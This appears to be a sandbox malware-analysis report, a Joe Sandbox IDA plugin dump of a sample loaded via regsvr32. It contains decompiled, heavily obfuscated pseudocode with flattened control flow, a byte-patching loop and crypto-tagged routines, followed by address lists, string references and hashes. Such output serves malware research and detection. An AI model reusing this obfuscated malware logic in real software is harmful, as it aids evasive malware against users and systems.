				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E04BA2B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E04B857B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E04B85026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E04B9C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E04B871B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E04B9CCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E04B8C5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E04B8FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E04BA2B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E04B9CCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E04B8E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x04b95780
0x04b9578a
0x04b9578b
0x04b95792
0x04b95794
0x04b95796
0x04b9579d
0x04b957a4
0x04b957a5
0x04b957a6
0x04b957ab
0x04b957bf
0x04b957c7
0x04b957c8
0x04b957cd
0x04b957d2
0x04b957d5
0x04b957d6
0x04b957de
0x04b957e7
0x04b957ec
0x04b957f7
0x04b957fb
0x04b957ff
0x04b9580a
0x04b95815
0x04b95820
0x04b9582b
0x04b95833
0x04b9583b
0x04b95843
0x04b9584b
0x04b95853
0x04b9585b
0x04b95864
0x04b95867
0x04b9586b
0x04b95870
0x04b95878
0x04b9588b
0x04b95892
0x04b9589d
0x04b958a8
0x04b958b0
0x04b958b7
0x04b958c2
0x04b958ca
0x04b958d2
0x04b958da
0x04b958e2
0x04b958ea
0x04b958ef
0x04b958f4
0x04b958fc
0x04b95904
0x04b9590c
0x04b95916
0x04b9591a
0x04b95922
0x04b9592a
0x04b95932
0x04b9593a
0x04b95942
0x04b95955
0x04b9595e
0x04b95969
0x04b95974
0x04b9597f
0x04b9598a
0x04b95992
0x04b9599a
0x04b959a2
0x04b959aa
0x04b959b2
0x04b959ba
0x04b959c2
0x04b959c7
0x04b959cf
0x04b959d7
0x04b959df
0x04b959e7
0x04b959ef
0x04b959f7
0x04b959fc
0x04b95a0a
0x04b95a0f
0x04b95a15
0x04b95a1d
0x04b95a25
0x04b95a2a
0x04b95a32
0x04b95a3a
0x04b95a42
0x04b95a4d
0x04b95a55
0x04b95a60
0x04b95a6b
0x04b95a73
0x04b95a7e
0x04b95a8a
0x04b95a8f
0x04b95a95
0x04b95a99
0x04b95aa1
0x04b95aad
0x04b95ab2
0x04b95ab8
0x04b95abd
0x04b95ac5
0x04b95ad0
0x04b95adb
0x04b95ae6
0x04b95aee
0x04b95af3
0x04b95af8
0x04b95b00
0x04b95b0c
0x04b95b11
0x04b95b15
0x04b95b1a
0x04b95b22
0x04b95b2a
0x04b95b32
0x04b95b37
0x04b95b41
0x04b95b4d
0x04b95b52
0x04b95b5d
0x04b95b60
0x04b95b64
0x04b95b6c
0x04b95b74
0x04b95b7c
0x04b95b84
0x04b95b8c
0x04b95b94
0x04b95b9c
0x04b95ba1
0x04b95baf
0x04b95bb3
0x04b95bbb
0x04b95bc3
0x04b95bcb
0x04b95bd3
0x04b95bdb
0x04b95be6
0x04b95bee
0x04b95bf9
0x04b95c01
0x04b95c09
0x04b95c0e
0x04b95c16
0x04b95c1e
0x04b95c29
0x04b95c34
0x04b95c3c
0x04b95c47
0x04b95c52
0x04b95c5d
0x04b95c68
0x04b95c73
0x04b95c7b
0x04b95c86
0x04b95c8e
0x04b95c93
0x04b95c98
0x04b95ca0
0x04b95cb3
0x04b95cba
0x04b95cc5
0x04b95ccd
0x04b95cdd
0x04b95ce5
0x04b95cf0
0x04b95cfb
0x04b95d06
0x04b95d0e
0x04b95d1b
0x04b95d1f
0x04b95d27
0x04b95d2f
0x04b95d42
0x04b95d49
0x04b95d54
0x04b95d5f
0x04b95d67
0x04b95d6f
0x04b95d74
0x04b95d7c
0x04b95d84
0x04b95d8c
0x04b95d94
0x04b95da2
0x04b95da5
0x04b95da9
0x04b95db1
0x04b95db1
0x04b95db1
0x04b95db1
0x04b95db8
0x04b95db8
0x04b95db8
0x04b95db8
0x04b95dbe
0x00000000
0x00000000
0x04b95dc4
0x04b95f56
0x04b95f5d
0x00000000
0x04b95f5d
0x04b95dd0
0x04b95f26
0x04b95f2b
0x04b95f30
0x04b960a6
0x04b960b7
0x04b960b7
0x04b95f36
0x00000000
0x04b95f36
0x04b95ddc
0x04b95e43
0x04b95e59
0x04b95e65
0x04b95e86
0x04b95e8b
0x04b95e92
0x04b95e99
0x04b95e9b
0x04b95ea3
0x04b95ea4
0x04b95ea9
0x04b95eab
0x04b95eae
0x04b95eb2
0x04b95ec7
0x04b95ee0
0x04b95ee1
0x04b95ee6
0x04b95eeb
0x04b95eee
0x04b95ef3
0x04b95ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x04b95eb4
0x04b95eb4
0x04b95eb4
0x04b95ebd
0x04b95ebf
0x04b95ebf
0x04b95ec2
0x04b95ec3
0x00000000
0x04b95eb4
0x04b95de4
0x04b95e35
0x00000000
0x04b95e35
0x04b95dec
0x00000000
0x00000000
0x04b95e08
0x04b95e09
0x04b95e0d
0x04b95e12
0x04b95e15
0x04b95e1a
0x04b95e2e
0x04b95e1c
0x04b95e1c
0x04b95e27
0x04b95e27
0x04b95e1a
0x04b95f6d
0x04b96067
0x04b96073
0x00000000
0x04b96073
0x04b96069
0x00000000
0x04b96069
0x04b95f79
0x04b9609f
0x00000000
0x04b960a5
0x04b95f85
0x04b9600c
0x04b9600d
0x04b9601b
0x04b9601d
0x04b96024
0x04b9602b
0x04b96039
0x00000000
0x04b96039
0x04b95f8d
0x00000000
0x00000000
0x04b95fa6
0x04b95faf
0x04b95fb9
0x04b95fcf
0x04b95fd7
0x04b95fe2
0x04b95fe7
0x04b95fec
0x00000000
0x00000000
0x04b95ff2
0x00000000
0x04b96078
0x04b96078
0x00000000
0x04b96084

Strings

Uh G, xrefs: 04B95D54
_jvP, xrefs: 04B95D74
xdX, xrefs: 04B95904
01, xrefs: 04B95D84
w=_, xrefs: 04B958F4
=G, xrefs: 04B95CC5
, xrefs: 04B95FD7
Ikz, xrefs: 04B95922
pk, xrefs: 04B958A8
~*, xrefs: 04B95A2A

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: 46fdba2362a70204012b7d18115f767bcebe456271f597763da51ab69c0c073a
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction Fuzzy Hash: BB2222711093809FD768CF25C58AA9BBBE2FFC5708F10891DE6D996260D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B97D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B97D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E04B81A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E04BA2D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x4b8196c,  &_v520,  &_v1040, E04B9E1F8(0x4b8196c, _v2768, __eflags));
						E04B9FECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E04B985FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E04BA0DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
					 *((short*)(E04B909DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					E04B8BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E04BA2D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x4b8188c,  &_v2080,  &_v2600, E04B9E1F8(0x4b8188c, _v2736, _t501));
					E04B9FECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E04B8BFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x04b97d5b
0x04b97d61
0x04b97d6a
0x04b97d71
0x04b97d78
0x04b97d7f
0x04b97d90
0x04b97d94
0x04b97d9a
0x04b97da1
0x04b97da6
0x04b97db1
0x04b97db2
0x04b97db6
0x04b97dbe
0x04b97dc9
0x04b97dd1
0x04b97ddc
0x04b97de4
0x04b97dec
0x04b97df4
0x04b97dfc
0x04b97e07
0x04b97e12
0x04b97e1d
0x04b97e28
0x04b97e30
0x04b97e3b
0x04b97e43
0x04b97e50
0x04b97e54
0x04b97e5c
0x04b97e64
0x04b97e6c
0x04b97e74
0x04b97e7c
0x04b97e84
0x04b97e8c
0x04b97e94
0x04b97e99
0x04b97ea1
0x04b97ea9
0x04b97eb4
0x04b97ebf
0x04b97eca
0x04b97ed5
0x04b97ee0
0x04b97eeb
0x04b97ef3
0x04b97efb
0x04b97f00
0x04b97f08
0x04b97f13
0x04b97f1e
0x04b97f29
0x04b97f31
0x04b97f36
0x04b97f44
0x04b97f48
0x04b97f50
0x04b97f5b
0x04b97f63
0x04b97f6e
0x04b97f76
0x04b97f83
0x04b97f87
0x04b97f8f
0x04b97f99
0x04b97fa4
0x04b97faf
0x04b97fba
0x04b97fc5
0x04b97fd0
0x04b97fdb
0x04b97fe6
0x04b97fef
0x04b97ff4
0x04b97ffd
0x04b98008
0x04b98010
0x04b98015
0x04b9801a
0x04b98022
0x04b9802d
0x04b98038
0x04b98043
0x04b9804f
0x04b98054
0x04b9805a
0x04b9805f
0x04b98067
0x04b9806f
0x04b98074
0x04b9807c
0x04b98084
0x04b9808c
0x04b98094
0x04b98098
0x04b980a0
0x04b980ab
0x04b980b6
0x04b980c1
0x04b980c9
0x04b980d5
0x04b980da
0x04b980e0
0x04b980e8
0x04b980f0
0x04b980fd
0x04b980fe
0x04b98102
0x04b9810a
0x04b98115
0x04b98120
0x04b9812b
0x04b98136
0x04b98141
0x04b9814c
0x04b98154
0x04b9815c
0x04b98161
0x04b98169
0x04b98171
0x04b9817c
0x04b98187
0x04b98192
0x04b9819a
0x04b981a7
0x04b981b1
0x04b981b5
0x04b981bd
0x04b981c7
0x04b981d4
0x04b981e1
0x04b981e9
0x04b981f1
0x04b981fd
0x04b981fe
0x04b98202
0x04b9820a
0x04b98212
0x04b9821a
0x04b9821f
0x04b98227
0x04b9822f
0x04b98237
0x04b9823c
0x04b98244
0x04b9824c
0x04b98254
0x04b9825c
0x04b98264
0x04b9826c
0x04b98277
0x04b9827f
0x04b9828a
0x04b98292
0x04b9829a
0x04b982a2
0x04b982aa
0x04b982b5
0x04b982c0
0x04b982cb
0x04b982d6
0x04b982e1
0x04b982ec
0x04b982f7
0x04b982ff
0x04b9830a
0x04b98312
0x04b98317
0x04b9831f
0x04b98327
0x04b9832f
0x04b98337
0x04b9833c
0x04b98344
0x04b98357
0x04b9835e
0x04b98369
0x04b98371
0x04b98379
0x04b9837e
0x04b98386
0x04b98393
0x04b98397
0x04b9839f
0x04b983a4
0x04b983ac
0x04b983b8
0x04b983ba
0x04b983be
0x04b983c6
0x04b983ce
0x04b983d6
0x04b983e4
0x04b98546
0x04b9854b
0x04b98554
0x04b98558
0x04b985a1
0x04b985c1
0x04b985d0
0x00000000
0x04b985f1
0x04b983ea
0x04b983ec
0x04b9850a
0x04b9850a
0x04b98510
0x00000000
0x00000000
0x00000000
0x00000000
0x04b985fe
0x04b985fe
0x04b985fe
0x04b98409
0x04b9842e
0x04b98452
0x04b98457
0x04b98463
0x04b98467
0x04b984b6
0x04b984d6
0x04b984e2
0x04b984f1
0x04b984f6
0x04b984fb
0x04b98501
0x00000000
0x04b98501
0x00000000
0x04b984fb
0x04b98508
0x00000000

Strings

^xZ, xrefs: 04B9817C
$P, xrefs: 04B97D8E
jz, xrefs: 04B97FE6
Gqx, xrefs: 04B97E64
}0, xrefs: 04B97FAF
)p?M, xrefs: 04B98317
O"r, xrefs: 04B98067
o, xrefs: 04B97F00
\f%0, xrefs: 04B97DD1
>}#, xrefs: 04B98369

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: 52786936780fe12675ba8267a316937501263b7d9f5a87da7057aebec704bcec
Instruction ID: 6138e120d3d11f062094096abd6ec71c02c8d0d3582f03696270d9f1d4766f20
Opcode Fuzzy Hash: 52786936780fe12675ba8267a316937501263b7d9f5a87da7057aebec704bcec
Instruction Fuzzy Hash: 981202B150D3809FD3A8CF21C949A9BBBE2FBC5708F10891DE1D996260D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 04B8238C, Relevance: 11.7, Strings: 9, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B8238C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t472;
				void* _t474;
				void* _t477;
				void* _t481;
				void* _t496;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed int _t507;
				signed int _t537;
				signed int _t548;
				void* _t550;
				void* _t555;

				_v1584 = _v1584 & 0x00000000;
				_v1788 = 0x33fdc0;
				_v1788 = _v1788 >> 6;
				_v1788 = _v1788 + 0xffff8381;
				_v1788 = _v1788 | 0x21bcf8d5;
				_v1788 = _v1788 ^ 0x23bcfbfd;
				_v1744 = 0xdaa9b2;
				_v1744 = _v1744 >> 0xa;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 * 0xc;
				_t496 = __ecx;
				_v1744 = _v1744 ^ 0x00028d02;
				_t550 = 0x854d193;
				_v1632 = 0x7e6112;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x07e103ba;
				_v1716 = 0xd48fca;
				_v1716 = _v1716 + 0x54b9;
				_v1716 = _v1716 >> 3;
				_v1716 = _v1716 ^ 0x00172ea2;
				_v1612 = 0xc953de;
				_v1612 = _v1612 + 0xffff7488;
				_v1612 = _v1612 ^ 0x00c8e870;
				_v1660 = 0xfcf42a;
				_v1660 = _v1660 ^ 0x4c4ed76c;
				_v1660 = _v1660 ^ 0x4cb955ce;
				_v1600 = 0xa6934b;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00032972;
				_v1604 = 0xac816b;
				_t498 = 0x70;
				_v1604 = _v1604 * 0x21;
				_v1604 = _v1604 ^ 0x16380272;
				_v1696 = 0x6f97e6;
				_v1696 = _v1696 | 0xa083c342;
				_v1696 = _v1696 ^ 0x07d73a4d;
				_v1696 = _v1696 ^ 0xa73f6dc5;
				_v1684 = 0xc2049d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 ^ 0x7749f8a8;
				_v1684 = _v1684 ^ 0x6f051565;
				_v1652 = 0xcc0992;
				_v1652 = _v1652 / _t498;
				_v1652 = _v1652 ^ 0x000062be;
				_v1644 = 0xb03f6e;
				_v1644 = _v1644 | 0x923ba096;
				_v1644 = _v1644 ^ 0x92bf0244;
				_v1596 = 0xe574f1;
				_t499 = 0x34;
				_v1596 = _v1596 * 0x7b;
				_v1596 = _v1596 ^ 0x6e3d68f9;
				_v1712 = 0x56ecc;
				_v1712 = _v1712 | 0x82f65ce8;
				_v1712 = _v1712 ^ 0x3fbbcfe7;
				_v1712 = _v1712 ^ 0xbd43ec0e;
				_v1672 = 0x17149a;
				_v1672 = _v1672 >> 3;
				_v1672 = _v1672 ^ 0x000903bb;
				_v1780 = 0xd02801;
				_v1780 = _v1780 + 0x92b0;
